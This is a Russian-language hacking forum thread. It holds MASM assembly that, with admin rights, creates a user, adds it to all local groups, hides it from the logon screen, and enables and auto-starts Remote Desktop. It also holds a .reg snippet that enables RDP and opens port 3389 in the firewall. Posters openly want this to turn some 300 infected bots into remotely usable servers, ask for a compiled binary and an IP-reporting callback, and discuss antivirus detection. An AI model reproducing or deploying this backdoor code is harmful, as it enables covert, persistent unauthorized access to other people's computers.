    Sstat SERVICE_STATUS <0>
    Sconf QUERY_SERVICE_CONFIG <0>
    bneed dd ?
    
    advpack db "advpack.dll",0
    IsAdmin db "IsNTAdmin",0
    _IsNTAdmin dd ?
    hLib dd ?
    szWin db MAX_PATH dup(?)
    
    .code
    start:
        
    ;NT Root
    ;==========================================================================
    ;Проверка на привилегии
    ;=======================
    	invoke LoadLibrary,addr advpack
    	mov hLib,eax
    	invoke GetProcAddress,hLib,addr IsAdmin
    	mov _IsNTAdmin,eax
    	push 0
    	push 0
    	call _IsNTAdmin
        .if eax == 0
        	jmp error
        .endif
    ;================================
    ; Заполняем структуру пользователя
    ;================================    
    	mov Uinfo.usri1_name,offset wzUser
    	mov Uinfo.usri1_password,offset wzPass
    	mov Uinfo.usri1_priv,USER_PRIV_USER
    	mov Uinfo.usri1_flags,UF_SCRIPT or UF_DONT_EXPIRE_PASSWD
    	
    ;================================
    ; Удаляем добавляем пользователя
    ;================================
    	invoke NetUserDel,NULL,addr wzUser
    	
    	invoke NetUserAdd,NULL,1,addr Uinfo,addr Err
    	cmp eax,0
    	jne error
    ;================================
    ; Перечисляем группы
    ;================================	
    	invoke NetLocalGroupEnum,0,1,addr Ginfo,0fffffffh,addr Eread,addr Etotal,0
    	cmp eax,0
    	jne error
    	
    	mov ecx,Eread
    go: push ecx
    
    	mov edx,dword ptr [Ginfo]
    	mov edx,dword ptr [edx+ecx*8-8]
    ;=====================================
    ; Добавляем пользователя во все группы
    ;=====================================	
    	invoke NetLocalGroupAddMembers,NULL,edx,3,addr pwzUser,1
    	pop ecx
    	loop go
    	
    	invoke NetApiBufferFree,addr Ginfo
    ;============================================
    ; Добавляем пользователя в состав специальных
    ;============================================	
    	invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szSacc,0,6,addr hKey
    	invoke RegSetValueEx,hKey,addr szUsr,0,REG_DWORD,addr Zer,sizeof Zer
    	invoke RegCloseKey,hKey
    ;============================================
    ; Разрешаем терминальные подключения
    ;============================================	
    	invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szTerm,0,6,addr hKey
    	invoke RegSetValueEx,hKey,addr szVal,0,REG_DWORD,addr Zer,sizeof Zer
    	invoke RegCloseKey,hKey
    	
    	invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szLic,0,6,addr hKey
    	invoke RegSetValueEx,hKey,addr szSes,0,REG_DWORD,addr One,sizeof One
    	invoke RegCloseKey,hKey
    	
    	invoke OpenSCManager,0,0,SC_MANAGER_CONNECT
    	mov Scm,eax
    	invoke OpenService,Scm,addr szSrvc,SERVICE_START or SERVICE_QUERY_STATUS or SERVICE_CHANGE_CONFIG
    	mov Srvc,eax
    ;============================================
    ; Запрашивем статус сервиса терминалов
    ;============================================
    	invoke QueryServiceConfig,Srvc,NULL,0,addr bneed
    	invoke QueryServiceConfig,Srvc,addr Sconf,bneed,addr bneed
    	cmp Sconf.dwStartType,SERVICE_AUTO_START
    	je autok
    	invoke ChangeServiceConfig,Srvc,-1,SERVICE_AUTO_START,-1,0,0,0,0,0,0,0
    autok:
    	invoke QueryServiceStatus,Srvc,addr Sstat
    	cmp Sstat.dwCurrentState,SERVICE_RUNNING
    ;=============================================
    ; Если на запушен запускаем
    ;=============================================
    	je stnreq
    	invoke StartService,Srvc,0,0
    stnreq:	
    	invoke CloseServiceHandle,Scm
    	
    	
    ok:	invoke ExitProcess,0
    error: invoke ExitProcess,1
    end start
    
     
    #13 dr.Pilulkin, 8 Mar 2010
    Last edited: 8 Mar 2010
    2 people like this.
  14. rebbe

    rebbe New Member

    Joined:
    8 Jan 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    дайте плиз уже скомпилинный ехе,и еще вопрос:
    а можно как нибудь прикрутить запрос еще?например ставлю скрипт который собирает ип и если все ровно установилось с прямым ипом то он отстукивается на скрипт,вот так как нибудь можно замутить?
    просто есть ботов штук 300,хотел их просто прогрузить что бы дедиков из них сделать
     
  15. Axeee

    Axeee Elder - Старейшина

    Joined:
    26 Nov 2008
    Messages:
    286
    Likes Received:
    15
    Reputations:
    0
    лучше выложите сами сорцы в архиве, потому что те которые выложены тут все покоцынные..
     
  16. Fliplab

    Fliplab Elder - Старейшина

    Joined:
    29 Jul 2008
    Messages:
    123
    Likes Received:
    20
    Reputations:
    3
    Ты болен братан.... Тебя при рождении самого покоцало походу...
     
    1 person likes this.
  17. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    838
    Reputations:
    402
    а смысл, если любая компиляция начнется палиться ВСЕМИ антивирусами через 2 дня после того, как будет выложена? Даже несмотря на то, что в этом коде нет ничего "вредоносного".
    Я тут один небольшой рабочий ехе всего 4 людям знакомым дал на тест (ради интереса), так уже через 3 дня ехе палился! Кто-то догадался прогнать вирустоталом! :D

    Нет. такие вещи могут распространяться только в исходных кодах и только в учебных целях.
     
    #17 ErrorNeo, 31 Mar 2010
    Last edited: 31 Mar 2010
  18. Axeee

    Axeee Elder - Старейшина

    Joined:
    26 Nov 2008
    Messages:
    286
    Likes Received:
    15
    Reputations:
    0
    я так понял ты тут мастер по флуду да ? ..ты можешь выложить сорцы норм или ты покоцанный флудер ?
     
  19. ali0101

    ali0101 New Member

    Joined:
    28 Jun 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    вот так будет точней
    Включаем
    "Разрешить удаленный доступ к этому компьютеру" через реестр:
    Code:
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
    
    
    Выключаем:
    Code:
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000001
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009"
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009"
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000001
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009"
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009"
    
    Проверено на виртуальной машине ,работает